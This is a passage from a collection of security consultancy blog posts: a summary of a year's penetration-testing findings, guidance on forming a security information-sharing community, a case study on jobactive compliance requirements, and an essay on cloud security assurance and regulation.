We interpret this as a reflection of the focus over recent years in closing off the higher risk issues in industries such as Finance and Technology and the higher frequency with which tests have been completed against these systems.

A clear outlier in the total data set is the Retail sector which presented a higher average number of High risks than Low risks. Whilst on general we believe that the Retail sector doesn’t have the security maturity as sectors such as Finance and Technology, we expect that this level of High risk findings is an anomaly and we will be interested to review next year’s data to identify whether a similar ration of Low:High findings is present.

Monthly Breakdown

Across the year, there is a clear set of peaks by way of the number of security assessment engagements, and subsequently number of findings identified each month. The below chart presents the number of engagements and findings per month across the 2016–17 period.


The data in the above chart aligns with our experiences in working in this industry- something that we’ve seen in place for more than 10 years. The peak periods are the leadup to the end of the financial year and the calendar year, which we attribute primarily to:

  • The need to complete projects prior the end of a forecast cycle (which in Australia is largely prior to the Christmas holiday period — “I need the project in by Christmas”), and
  • The need to expend budget prior to the end of a financial cycle (which in Australia is primarily end of June).

We will be interested to see if the number of engagements across approximately November 2017 through to March / April 2018 increases as a result of entities seeking increased security assurance prior to mandatory data breach notification[i] requirements coming into effect in February 2018 (applicable to entities subject to the Privacy Act 1988).

Common Weaknesses

To categorise our findings, we follow the Web Application Security Consortium (WASC) Threat Classifications[ii] where possible. This allows us to remain consistent between engagements, and provides for a transparent view of categorisation.

Out of 720 findings across WASC categories, the top 10 WASC categories comprised 88% all findings. The below chart visualises the top 10 weakness categories that we found across the year:


The most common type of risk found was Application Misconfiguration, which is a fairly wide issue category — usually encountered when an application is not configured with security in mind — and includes issues such as a lack of security headers, or having default files disclose configuration details and application version information. The second most common was Insufficient Authentication, which can be seen when issues such as default credentials are in use, or if the application suffers from username enumeration.

Interestingly, the majority findings relate to the insecure configuration of the target system (application, operating system, network device etc.), or failing to keep the system patched to address known security issues. In a large number of our assessments, the targets are off the shelf systems that do not include any custom development by the implementing organisation, only configuration. Whilst it is recognised that some of these security findings are outside of the control of the implementing organisation (vulnerabilities in the software itself), in the majority of instances if the implementing organisation was to:

  1. Follow vendor implementation guidance for secure configuration of the system (as well as any underlying infrastructure), and

2. Keep the system patched,

Then many of these findings would not exist.

Conclusion

We are clearly not to the point where the need for security assurance activities through hands-on testing and analysis of systems is unnecessary due to security being sufficiently ‘baked in’ to the overall solution.

Anecdotally, we do see that organisations which invest in security earlier in the lifecycle (e.g. defining solution security requirements, performing security threat modelling, undertaking security design reviews and code assessments) result in fewer and less severe findings when implementation testing (such as a vulnerability assessment) is performed against the solution. Those that first introduce security into the project lifecycle through a vulnerability assessment a week before go-live are typically the ones with the greatest number (and higher severity) of findings.

Additionally, as the industry progresses to the use of more and more commoditised services (e.g. Software as a Service) and the number of bespoke applications reduces as a percentage of all deployments, we expect that the number of security ‘misconfigurations’ will increase as a percentage of overall findings due to a reduction in unique security vulnerabilities. We also hope that such a migration will also reduce the number of overall findings through our engagements, as an increasing number of ‘secure by default’ settings become ingrained into offerings.

Finally, we plan to keep an eye on developments across industry and relevant governing legislation such as the mandatory breach reporting in Australia, and impacts on Australian entities stemming from the EU’s General Data Protection Regulation. We expect that these macro-level changes will filter through the number and types of security activities (including security assessments) that are executed, and it will be interesting to see if next year’s data-set indicates any impact from these types of initiatives.

We hope that the data presented here has provided you with some useful insight into Hivint’s 2016–17 technical assessment activities. If you would like to see more material that we’ve shared from our engagements — such as security test cases, cheat sheets, common security findings and more — sign up for a free subscription to our collaboration portal at https://portal.securitycolony.com/register.


Contributors: Aaron Doggett, Sam Reid, Cameron Stokes, and Jordan Sinclair


[i] Introduced through the Privacy Amendment (Notifiable Data Breaches) Act 2017 and defined as the Notifiable Data Breaches scheme. Additional details here: https://www.oaic.gov.au/engage-with-us/consultations/notifiable-data-breaches/

[ii] http://projects.webappsec.org/w/page/13246978/Threat%20Classification

Cybersecurity Collaboration

Establishing a security Community of Interest


Hivint is all about security collaboration.

We believe that organisations can’t afford to solve security problems on their own and need to more efficiently build and consume security resources and services. Whilst we see our Security Colony as a key piece to this collaboration puzzle, we definitely don’t see it as the only piece.

Through our advisory services, we regularly see the same challenges and problems being faced by organisations within the same industry. We also see hesitation between organisations to share information with others. This is often due to perceived competitiveness, lack of a framework to enforce sharing and fear of sharing too much information, along with privacy concerns.

We believe that it is important for organisations to realise that security shouldn’t compete between ‘competitors’, but instead against threats, and that working together to solve common security challenges is vital. We want to help make that happen. One such way — and the purpose of this article — is for a group of similar organisations to form a security Community of Interest (CoI).

This article outlines our suggested approach towards establishing and running a CoI, covering off a number of common concerns regarding the operation of such a community, and concludes with a link to a template that can be used by any organisation wishing to establish such a CoI.

Why is information sharing good?

Security information sharing and collaboration helps ensure that organisations across the industry learn from each other, leading to innovative thinking to deter cyber criminals. Our earlier blog post, Security Collaboration — The Problem and Our Solution, provides a detailed outlook on security collaboration.

We consider security collaboration as vital to making a difference to the economics of cyber-crimes, and as such we share what works and what doesn’t by making the output of our consulting engagements available on our Security Colony Portal.

However, we acknowledge that there are times when sharing could be more direct between organisations by forming a collective more closely — documents and resources could then be shared that are more specific to their industry (for example, acceptable use policies may be very similar across universities), or more sensitive in nature in a way that could make it unreasonable to share publicly (for example, sharing security related issues that may not have been effectively solved yet).

When does a Community of Interest work?

Sharing of information is most effective when a collective group is interested in a similar type of information. An example of this may be university institutions — while distinct entities will have different implementations, the overall challenges that each face is likely to be similar. Pooling resources such as policy, operating procedures, and to an extent metrics, provides a way to maximise performance of the group as a whole, while minimising duplication of effort.

When is Community of Interest sharing a bad idea?

Sharing agreements like a CoI will not be effective in all circumstances — a CoI will only work if information flows in both directions for the organisations involved. It would not be a suitable framework for things that generally flow in a single direction, such as government reporting. A CoI’s primary focus should also not be on sharing ‘threat intel’ as there are a number of services that already do this such as Cert Australia, Open Threat Exchange, McAfee Threat Intelligence Exchange and IBM X-Force to name a few.

How is information shared within a Community of Interest?

An important aspect of a CoI is the platform used for sharing between members of CoI. It is important to recognise the fact that platforms used will not be the same used across all CoI’s, each organisation will have unique requirements and preferences as to which platforms will be most effective in the circumstances. Platforms such as email-lists and portals can be effective for sharing electronically, however platforms like meetings (be it in person, or teleconference style) may be more effective in some cases.

What kind of information can be shared?

In theory, almost anything, however in practice there are seven major types of cybersecurity information suitable for sharing, according to Microsoft[1]. These are:

  • Details of attempted or successful incidents
  • Potential threats to business
  • Exploitable software
  • Hardware or business process vulnerabilities
  • Mitigations strategies against identified threats and vulnerabilities
  • Situational awareness
  • Best practices for incident management and strategic analysis of current and future risk environment.

Hivint recognises that every piece of information has different uses and benefits. Sharing of information like general policy documents, acceptable use policy, or processes that an organisation struggles with or perform well can uplift cyber resilience and efficiency among businesses. These are also relatively simple artefacts that can be shared to help build an initial trust in the CoI, and are recommended as a starting point.

What about privacy and confidentiality?

Keeping information confidential is a fundamental value for establishing trust within a CoI. To ensure this is maintained, guidelines must be established against sharing of customer information or personal records.

Information should be de-identified and de-sensitised to remove any content that could potentially introduce a form of unauthorised disclosure / breach, and limitations should be established to determine the extent of information able to be shared, as well as the authorised use of this information by the receiving parties.

How is a Community of Interest formed?

It is important to realise that organisations need not follow a single structure or model when setting up a CoI. Ideally, the first step is identifying and contacting like-minded people with an interest in collaborating from your network or business area. Interpersonal relationship between personnel involved in CoI is critical to retaining and enhancing the trust and confidence of all members. A fitting approach to creating such an environment is by initially exchanging non-specific or non-critical information on a more informal basis. Considering that sharing agreements like this require a progressive approach, it is best not to jump head first by sharing all the information pertaining to your business at the first instance.

Upon success of the first phase of sharing and development of a strong relationship between parties involved, a more formal approach is encouraged for the next phase.

Next Steps

We’ve made a Cyber Security Collaboration Framework available to all subscribers (free and paid) of Security Colony which can be used as a template to start the discussion with interested parties, and when the time comes, formally establish the CoI.

[1] ‘A Framework for Cybersecurity information sharing and risk reduction’ — https://www.microsoft.com/en-us/download/details.aspx?id=45516


Additional Information

There are a number of instances where cyber-security information sharing arrangements have been established around the world. The below provides links to a small number of these.

http://data.cambridgeshire.gov.uk/data/information-management/info-sharing-framework/cambs-information-sharing-framework.pdf

https://corpgov.law.harvard.edu/2016/03/03/federal-guidance-on-the-cybersecurity-information-sharing-act-of-2015/

https://www.enisa.europa.eu/publications/cybersecurity-information-sharing

jobactive Case Study


Meeting the jobactive security compliance requirements

Hivint has been involved with the jobactive program since early 2015, initially undertaking the required IRAP assessment for one of the approved third party IT providers, and since then working with many different jobactive providers to help guide them through the process towards achieving security accreditation.

This post provides an overview of the compliance requirements of the program, as well as suggested steps and considerations for any entity currently planning or pursuing compliance.

About the program

The Australian Government’s jobactive program, directed by the Department of Employment (‘the Department’) is an Australian-wide initiative aimed at getting more Australians working. Through the program, jobseekers are both aided in getting prepared for work (or back to work) and being connected with employers through a network of Employment Services Providers (‘providers’).

Under the program all providers are required to be accredited by the Department as being able to deliver — and continue to deliver — services in a manner that meet various conditions. One condition (defined in item 32 in the jobactive deed) relates to the protection of data entrusted to the provider by the Department in order to deliver these services; effectively extending many of the Australian Government security requirements that apply to the Department through to these providers.

The data security requirements that all providers — as well as third parties hosting jobactive data on behalf of providers — are required to meet have been drawn from two Australian Government publications and one law regarding the protection of information. The publications defining the security control requirements against which providers are required to be compliant with, as well as the number of controls drawn from each include:

jobactive Statements of Applicability

Rather than taking a big bang all or nothing approach — where providers are required to be compliant with all controls by a specific date — the Department has introduced a graduated approach to achieving compliance. This has been developed through the definition of three individual compliance stages defined within the jobactive Statements of Applicability (SoA), with the requirement for compliance phased across an approximate three-year period.

The perceived intent here is to start providers off with the need to establish a baseline security capability that is then matured with more advanced and complex controls over time. The overall timeframe for compliance, and number of controls in each stage and SoA include:


The below graph shows the breakdown of these SoAs as drawn from the three input documents. What is evident from the graph below is that SoA 1 covers a broad set of controls across most of the ISM security domains and the Privacy Act, providing a general security baseline for providers.

Progressing through the program (SoA2 through to SoA3) security becomes more focused in specific domains and extended to include more advanced and complex technical controls within the framework.


Assessment requirements

It’s easy to see that the lion’s share of the requirements have been drawn from the ISM, which reflects the Department’s focus on information security through cyber-security.

The Department has leveraged the existing register of security professionals already authorised to complete formal assessments of systems against the ISM for certification and accreditation by government bodies. The Information Security Registered Assessor Program (IRAP) list of assessors is maintained by the Australian Signals Directorate (ASD), the same body that is responsible for the ISM.

The Department has given providers the option to undertake a self-assessment for the first compliance assessment, but require formal assessments by IRAP assessors for stages 2 & 3. These assessments include:

  • The first assessment is considered a self-assessment, whereby providers completed their own against the controls defined in SoA 1, and report findings to the Department for review.
  • The second assessment is required to be completed by an IRAP assessor, with assessment coverage of controls defined in both SoA 1 and SoA 2.
  • The third assessment is also required to be completed by an IRAP assessor, and so long as the risk profile or environment hosting jobactive data hasn’t significantly changed, the assessment may be completed against the controls in SoA 3 only (we recommend validating this position with the IRAP assessor and Department prior to conducting this assessment).
  • From this point, the provider is required to undergo assessment no less than every three years — potentially sooner if the Department requests a new assessment based on factors such as a change in governance arrangements, changing cyber threats or other factors that change the IT security landscape for the provider.

Where to start

Achieving a level of compliance, acceptable to the Department against the full set of security controls reflected across the SoAs can be a daunting task for many providers. We’ve worked with a variety of providers, from small, single office not-for-profits, through to large Australian wide commercial providers and each has needed to invest considerable time and effort to achieve the target compliance posture.

However regardless of the size, scope and overall security maturity of the provider that we’ve worked with, the general approach that we’ve successfully employed with each has the same main principles and phases, being:

  • Phase 1 — Scope Definition, Reduction and Validation
  • Phase 2 — Risk and Control Definition
  • Phase 3 — Control Implementation & Refinement
  • Phase 4 — SoA 1 and 2 Assessment
  • Phase 5 — Control Implementation & Refinement
  • Phase 6 — SoA 3 Assessment

A high level overview of the first two phases is provided below.

Phase 1 — Scope Definition, Reduction and Validation

This is a crucial first step that is often overlooked by providers. We strongly believe that proper planning greatly increases your likelihood of an overall successful initiative, both financially and operationally; reducing the likelihood of unnecessary and wasteful investment, and clearly establishing the bounds for compliance. We recommend that providers undertake each of the following, and whilst not mandated, having an IRAP assessor engaged to assist through the process can also speed this activity up, and improve the outcomes considerably.

1. Establish your scope. It’s often not clear exactly what data is subject to the Department’s requirements (Is it only data retrieved from Employment systems? What about data provided directly from jobseekers? Data that is obtained from other providers? And so on…). Knowing what’s in scope and what isn’t can help ensure that you can focus your compliance efforts appropriately. We recommend that providers:

  • Identify jobseeker information coming into the organisation. Document the Employment provided systems where you retrieve or access jobseeker information, the method that you obtain it as well as the type of information that you retrieve.
  • Identify where you build on this information. Document instances where you build on this information through other sources- e.g. jobseeker provided information, and again, capture the type and method of information that you obtain.
  • Identify who you share this information with. Document instances where you share information with third parties in support of jobseeker services.
  • Define your business process. Capture the above processes together as a set of workflows, outlining the relevant actors, information types and actions performed.
  • Overlay these processes across your environment. Overlay these processes across your physical, personnel and IT environments — including those hosted by third parties, such as Department accredited entities, ASD certified providers, or any other entity (don’t forget to include support processes such as offsite backups, or remote connections from IT service providers into your environment).

2. Validate your scope. Engage with the Department’s Security Compliance team to discuss what you have established, and seek input as to whether you are able to remove certain entities, information types and processes from your scope. The Department may also be able to assist by providing upfront guidance on critical / high-risk issues with your practices (e.g. storing jobactive data offshore by a non-approved provider)

3. Define a plan to reduce your scope. This is an optional activity whereby a provider may wish to reduce or otherwise change their scope to reduce the compliance exposure. Some entities have taken the path to apply the controls to their entire business (as they are seen as good practice security controls — regardless of the data types that they are protecting), and other have reduced their scope by changing or consolidating systems and business processes utilising jobactive data.

4. Review the SoAs and remove controls that don’t apply. The SoAs contain a combined 409 security controls, however not all apply to all providers. So rather than investing in unnecessary compliance expenditure, documenting controls that the provider considers are out of scope, and including justification for them can save a lot of effort. For example:


5. Validate your scope. Following any documented proposal to reduce your environment scope and / or remove controls from the SoA, validation with the Department and / or your IRAP assessor is critical. Only once the revised scope has been validated should you implement the changes.

Phase 2 — Risk and Control Definition

Once the scope has been established providers are in a position to define and implement controls to meet the Department’s security compliance requirements.

Our immediate recommended next step is for providers to formally assess their security risk posture, and then begin to establish key overarching security artefacts that will govern their security controls.
This includes:

  • Document the Security Risk Management Plan (SRMP) — this document captures the various security risks to jobactive data within the providers scoped environment, as well as the controls in place and planned to be in place to mitigate these risks to an acceptable level.
  • Define the System Security Plan — this document is derived from the SRMP, the environment scope, and the Department’s SoAs and describes the implementation and operation of security controls for the system.
  • Define the security documentation framework — various documents which collectively detail the provider’s security controls. This typically comprises security policies, standards, plans and procedures.

We recognise that many providers have not previously needed to establish the majority of the above, and we suggest that you refer to the ISM Controls Manual for further detail describing each of the required documentation artefacts, or alternatively get in touch with an IRAP assessor to assist.

Phase 3 and Beyond

From this point, providers should be well positioned to implement the various controls defined, and then progress towards the required SoA 1 self-assessment, and subsequent IRAP assessments.

At this stage, providers may also wish to undertake a compliance gap assessment against the controls across the SoAs to help identify the overall compliance posture, and inform the prioritisation, as well as overall resourcing and investment in the compliance initiative.

Maintaining an IRAP Assessor (or alternatively, an individual with previous experience in adopting the ISM control framework) in an advisory capacity throughout this process* can also help in ensuring that the provider stays on track through the process.

Need a Hand?

Hivint maintains a team of IRAP Assessors and security consultants across Australia with extensive experience in Federal Government security requirements and the development and application of ISM security control frameworks and compliance strategies.

If you have any questions regarding the Department’s security compliance requirements, or if you may need a hand in working out where to start (or how to progress), please get in touch with us here.


Case Study by Aaron Doggett, Regional Director, Hivint

* To remove any potential conflict of interest, the IRAP Assessor engaged to perform the formal assessments must not also operate in an advisory / consulting capability to the provider.

The Cloud Security Challenge

As the use of cloud services continues to grow, it’s generally well accepted that in most cases reputable service providers are able to use their economies of scale to offer levels of security in the cloud that match or exceed what enterprises can establish for themselves.


What is less clear is whether there are currently appropriate mechanisms available to enable an effective determination of whether the security controls a cloud service provider has in place are appropriately adapted to the needs of their various customers (or potential customers). There’s also a lack of clarity as to whether providers or customers should ultimately bear principal responsibility for answering this question.

These ambiguities are particularly highlighted in the case of highly abstracted public cloud services where the organisations using them have very little ability to interact with and configure the underlying platform and processes used to provide the service. In particular, the ‘shared environment’ these types of services offer creates a complex and dynamic risk profile: the risk to any one customer of using the service — and the risk profile of the cloud service as a whole — is inevitably linked with all the other customers using the service.

This article explores these issues in more detail, including discussing why representations around the security of cloud services is likely to become an increasingly important issue.

Why it matters: regulators are starting to care about security

It is important to appreciate the regulatory context in which the growth in the use of cloud services is taking place. Specifically, there is evidence of an increasing interest by regulators and policymakers in the development of rules around cyber security related matters2. This includes indications of increased scrutiny regarding representations about cyber security that are made by service providers.

Two recent cases in the USA highlight this. In one instance, the Consumer Financial Protection Bureau (a federal regulator, similar to the Australian Securities and Investments Commission) fined Dwolla — an online payment processing company — one hundred thousand US dollars after it found Dwolla had made misleading statements that it secured information it obtained from its customers in accordance with industry standards3.

Similarly, the US Federal Trade Commission recently commenced legal proceedings against Wyndham Worldwide, a hospitality company that managed and franchised a group of hotels. After a series of security breaches, hackers were able to obtain payment card information belonging to over six hundred thousand of Wyndham’s consumers, leading to over ten million dollars in losses as a result of fraudulent transactions.

The FTC alleged that Wyndham had contravened the US Federal Trade Commission Act by engaging in ‘unfair and deceptive acts or practices affecting commerce’4. The grounds for this allegation were numerous, but included that Wyndham had represented on its website that it secured sensitive personal information belonging to customers using industry standard practices, when it was found through later investigations that key information (such as payment card data) was stored in plain text form.

The case against Wyndham was ultimately settled out of court, but demonstrates an increasing interest by regulators in representations made in relation to cyber security by service providers. It is not inconceivable that similar action could be taken in Australia if corresponding circumstances arose, given the Australian Competition and Consumer Commission’s powers to prosecute misleading and deceptive conduct under the Australian Consumer Law5.

While the above cases do not apply to cloud service providers per se, they serve as examples of the increasing regulatory interest that is likely to be given to issues that relate to cyber security. Indeed, while regulatory regimes around cyber security issues are still in relatively early stages of development, it is feasible to expect that cloud providers in particular will come under increased scrutiny due to their central role in supporting the technology and business functions of a high number of customers from multiple jurisdictions.

There is also a strong likelihood that this scrutiny will extend to the decisions made by customers of cloud providers. In Australia, for example, if a company wishes to store personal information about its customers on a cloud service provider’s servers overseas, they would (subject to certain exceptions) need to take reasonable steps to ensure the cloud provider did not breach the Australian Privacy Principles in the Privacy Act 1988 in handling the information. Among other things, this would include ensuring that the cloud provider took reasonable steps to secure the information6. Similarly, data controllers (and data processors) in the EU will be required under the new Data Protection Regulation to ensure that appropriate technical and organisational measures are in place to ensure the security of personal data7.

The question then arises as to how cloud service providers and their customers are supposed to make sure they take appropriate steps to ensure they meet their responsibilities in assuring the security of cloud services in the context of a nascent and still developing regulatory environment. At first glance, the solution to the problem appears simple — benchmarking a cloud service against industry security standards. As discussed below, however, there are significant challenges with this approach.

The problem with bench-marking cloud security against industry standards

Many cloud service providers point to certification against standards such as ISO 27001:2013, ISO 27017, ISO 27018 (from a privacy perspective), the Cloud Security Alliance’s STAR program, or obtaining Service Organisation Control 2 / 3 reports as demonstration that their approach to security aligns with best practice. This is in addition to the option of undertaking government accreditation programs, such as IRAP in Australia or FedRAMP in the USA, avenues which some providers also pursue.

While this seems a logical approach, public cloud services and the shared environments they introduce create some unique considerations from a security perspective that complicate matters. Specifically, the potential security risk to any one customer of using these shared environments is inevitably closely intertwined with, and varies based on:

  • their own intended use of the service; and
  • the security risks associated with all other clients using the cloud service8.


As a result, any assessment of a cloud service provider’s security is inevitably reflective of their risk profile at a specific point in time, despite the fact that the risks facing the provider may have changed since based on its dynamic customer base. To illustrate this point, consider the hypothetical case study below.

Case study

X is a public cloud service provider that has been in business for a few years, and provides remote data storage services. X has primarily marketed itself to small businesses which make up the bulk of its customer base, and offers a highly abstracted cloud service with customers having little visibility of and ability to customise the underlying platform.

Those organisations have not stored particularly sensitive information on X’s servers. X has nevertheless obtained ISO 27001:2013 certification during this period — which includes a requirement that the cloud provider implement a risk assessment methodology and actually conducts a risk assessment process for its service on a periodical basis9.

X is then approached by a large multi-national engineering firm, who wants to store highly sensitive information regarding key customers in the cloud to reduce its own costs. The firm wishes to engage a public cloud provider that is ISO 27001:2013 compliant and notices X meets this requirement.

X is planning to conduct a risk assessment to review its current risk profile in 3 months, however, its current set of security controls — against which it obtained ISO 27001 certification — have been designed to address the level of risk associated with customers who use its cloud services for storing relatively insensitive data.

The engineering firm is unaware of this and engages X despite the fact their security controls may not be appropriately adapted to meet its requirements.

As this case study illustrates, whether it’s appropriate for an organisation to engage a cloud provider from a security perspective isn’t a question that can be answered purely by reference to whether they have been deemed compliant with certain standards. The underlying assumptions upon which the cloud provider’s compliance was determined — and whether those assumptions still hold true — are just as important. And yet in many circumstances, it is unlikely (and impractical to expect) that key documents that reveal those assumptions (such as risk registers and treatment plans) — will be made available publicly by cloud service providers so that these investigations can be undertaken by customers. And even if this information can be made available, the customer first has to have the security maturity and awareness to know to ask for such documents and be able to perform the required assessment.

Responsibility for cloud security — a two-way street

Given the limited utility of industry standards in assuring the security of cloud services, and the potential relevance of regulatory responsibilities that could apply to both service providers and their customers, the most reasonable argument is that both parties have a role to play in establishing that a particular cloud service offers an appropriate level of security. While it is difficult to define the precise scope of those responsibilities in the context of a nascent regulatory landscape, this article offers some guidance below.

Customers of cloud services

Customers need to make sure they conduct a sufficient level of due diligence prior to using a cloud service to ensure that its design is appropriately adapted to meet their needs from a security perspective. In particular, they should consider the following:

  • Does the cloud service create a high degree of abstraction from the underlying platform (public cloud services, for example, often have a high level of abstraction where users have very limited — if any — ability to configure the underlying platform). If so, this may mean the service is less suited to more sensitive uses where a high degree of control by the customer is required.
  • Is the use of a shared IT environment — in which the risk profile of the cloud service as a whole varies dynamically as its customer base changes — appropriate?
  • Are the security controls put in place by the cloud provider appropriate to satisfy the organisation’s intended use of the service?
  • Does the cloud provider make available details of security risk assessments and risk management plans?
  • Are there any other considerations that may have a bearing on whether using the cloud service is appropriate (e.g. a regulatory requirement or a strong preference to have the data stored locally rather than overseas)?

Generally speaking, the higher the level of sensitivity and criticality associated with the planned uses of a cloud service, the more cautious a customer needs to be before making a decision to use a service offered in a shared environment. If the choice is still made to proceed (as opposed to using a private cloud, for example), the reasons for this decision should be documented and subject to appropriate executive sign-off and oversight (as well as regular review). This will prove particularly valuable in case the decision is scrutinised by external bodies (e.g. regulators) at a later date10.

Cloud service providers

It is important that cloud providers are transparent with their customers about the security measures they have in place throughout the course of the period they are engaged by the customer. While representing that the cloud service is certified against particular industry benchmarks is useful to some extent, the cloud provider should also provide their own information to customers as to the specific security controls they do — and don’t — have in place, and the level of risk those controls are designed to address. In addition, cloud providers should be proactive about informing their customers where circumstances may have arisen that have resulted in a material change to their risk profile.

Providing this information is important to enable potential customers of cloud services to ascertain whether use of the service is appropriate for their needs.

Conclusion

Clearly, the shift towards the use of cloud services is now well established. This is a not a problem in and of itself. However, while regulatory expectations around cyber security are still being established, organisations need to ensure that they choose a cloud service provider only after first carefully considering what their requirements are and whether the cloud service offers an approach to security and a risk profile that is adapted to their needs. Service providers need to facilitate this process as best they can through a transparent dialogue with their customers about their approach to security and their risk profile.

By Arun Raghu, Cyber Research Consultant at Hivint. For more of Hivint’s latest cyber security research, as well as to access our extensive library of re-usable cyber security resources for organisations, visit Security Colony


  1. Note this write up focuses less on dedicated cloud environments (e.g. private cloud arrangements), where these complexities are largely avoided because a service can be customised and secured with a specific focus on a particular customer.
  2. This article does not cover this in detail, but examples include the development of the Network Information and Security Directive in the EU; the rollout of Germany’s IT Security Act; the ongoing discussions around legislated cyber security information sharing frameworks in the USA; and the proposal in late 2015 to amend Australia’s existing Telecommunications Act 1997 to include revised obligations on carriers and service providers to do their best to manage the risk of unauthorised access and interference in their networks, including a new notification requirement on carriers and some carriage service providers to notify of planned changes to networks that may make them vulnerable to unauthorised access and interference.
  3. See the regulator’s findings for details.
  4. See the FTC site for additional details on the Wyndham case.
  5. See section 18 of Schedule 2 of the Competition and Consumer Act 2010.
  6. See in particular Australian Privacy Principles 8 and 11.
  7. See Article 30 of the proposed text for the EU’s General Data Protection Regulation.
  8. The risks introduced by other clients of the cloud service may vary depending on the sector(s) in which they operate and their potential exposure to cyber-attacks as well as their intended use of the service.
  9. See in particular section 6.1 of the ISO 27001:2013 standard.
  10. A relevant consideration that may also be taken into account by regulators or other external bodies is what would reasonably be expected by an organisation of the same type in the same industry before engaging a cloud service provider — this would help ensure that unreasonable levels of due diligence are not expected of organisations with limited resources, for example.